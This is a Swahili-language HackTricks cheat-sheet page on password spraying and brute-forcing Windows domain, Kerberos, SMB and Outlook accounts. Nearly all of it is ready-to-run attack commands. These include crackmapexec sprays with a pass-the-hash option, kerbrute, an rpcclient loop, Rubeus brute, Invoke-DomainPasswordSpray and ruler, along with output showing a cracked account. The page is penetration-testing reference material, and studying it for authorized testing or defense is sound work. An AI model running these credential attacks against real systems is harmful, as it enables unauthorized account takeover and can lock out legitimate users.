Swahili - Ht
HackTricks Training Twitter Linkedin Sponsor

Password Spraying / Brute Force

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Kupiga Kura ya Nywila

Baada ya kupata majina ya mtumiaji halali kadhaa unaweza kujaribu nywila za kawaida zaidi (zingatia sera ya nywila ya mazingira) kwa kila mmoja wa watumiaji uliowagundua. Kwa chaguo-msingi urefu wa nywila ni 7.

Orodha za majina ya mtumiaji wa kawaida zinaweza kuwa na manufaa pia: https://github.com/insidetrust/statistically-likely-usernames

Tambua kwamba unaweza kufunga akaunti kadhaa ikiwa unajaribu nywila zisizo sahihi (kwa chaguo-msingi zaidi ya 10).

Pata sera ya nywila

Ikiwa una siri za mtumiaji au shell kama mtumiaji wa kikoa unaweza pata sera ya nywila na:

# From Linux
crackmapexec <IP> -u 'user' -p 'password' --pass-pol

enum4linux -u 'username' -p 'password' -P <IP>

rpcclient -U "" -N 10.10.10.10;
rpcclient $>querydominfo

ldapsearch -h 10.10.10.10 -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength

# From Windows
net accounts

(Get-DomainPolicy)."SystemAccess" #From powerview

Kutumia crackmapexec:

crackmapexec smb <IP> -u users.txt -p passwords.txt
# Local Auth Spray (once you found some local admin pass or hash)
## --local-auth flag indicate to only try 1 time per machine
crackmapexec smb --local-auth 10.10.10.10/23 -u administrator -H 10298e182387f9cab376ecd08491764a0 | grep +
# Password Spraying
./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com [--dc 10.10.10.10] domain_users.txt Password123
# Brute-Force
./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com [--dc 10.10.10.10] passwords.lst thoffman

  • kupuliza (unaweza kuonyesha idadi ya jaribio za kuepuka kufungwa):

spray.sh -smb <targetIP> <usernameList> <passwordList> <AttemptsPerLockoutPeriod> <LockoutPeriodInMinutes> <DOMAIN>

  • Kutumia kerbrute (python) - SIJASHAURIWA MARA KWA MARA HAIFANYI KAZI

python kerbrute.py -domain jurassic.park -users users.txt -passwords passwords.txt -outputfile jurassic_passwords.txt
python kerbrute.py -domain jurassic.park -users users.txt -password Password123 -outputfile jurassic_passwords.txt

  • Kwa moduli ya scanner/smb/smb_login ya Metasploit:

  • Kutumia rpcclient:

# https://www.blackhillsinfosec.com/password-spraying-other-fun-with-rpcclient/
for u in $(cat users.txt); do
rpcclient -U "$u%Welcome1" -c "getusername;quit" 10.10.10.10 | grep Authority;
done

Kutoka kwa Windows

  • Kwa Rubeus toleo lenye moduli ya kufyatua:

# with a list of users
.\Rubeus.exe brute /users:<users_file> /passwords:<passwords_file> /domain:<domain_name> /outfile:<output_file>

# check passwords for all users in current domain
.\Rubeus.exe brute /passwords:<passwords_file> /outfile:<output_file>

  • Kwa Invoke-DomainPasswordSpray (Inaweza kuzalisha watumiaji kutoka kwa kikoa kwa chaguo-msingi na itapata sera ya nenosiri kutoka kwa kikoa na kikomo cha majaribio kulingana nayo):

Invoke-DomainPasswordSpray -UserList .\users.txt -Password 123456 -Verbose
Invoke-SprayEmptyPassword

Kujaribu Kwa Nguvu

legba kerberos --target 127.0.0.1 --username admin --password wordlists/passwords.txt --kerberos-realm example.org

Kufikia Barua pepe ya Outlook

Kuna zana nyingi za kupulizia nywila kwenye outlook.

Ili kutumia zana yoyote kati ya hizi, unahitaji orodha ya watumiaji na nywila / orodha ndogo ya nywila za kupulizia.

./ruler-linux64 --domain reel2.htb -k brute --users users.txt --passwords passwords.txt --delay 0 --verbose
[x] Failed: larsson:Summer2020
[x] Failed: cube0x0:Summer2020
[x] Failed: a.admin:Summer2020
[x] Failed: c.cube:Summer2020
[+] Success: s.svensson:Summer2020

Google

Okta

Marejeo

Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

PreviousPass the TicketNextPrintNightmare

Last updated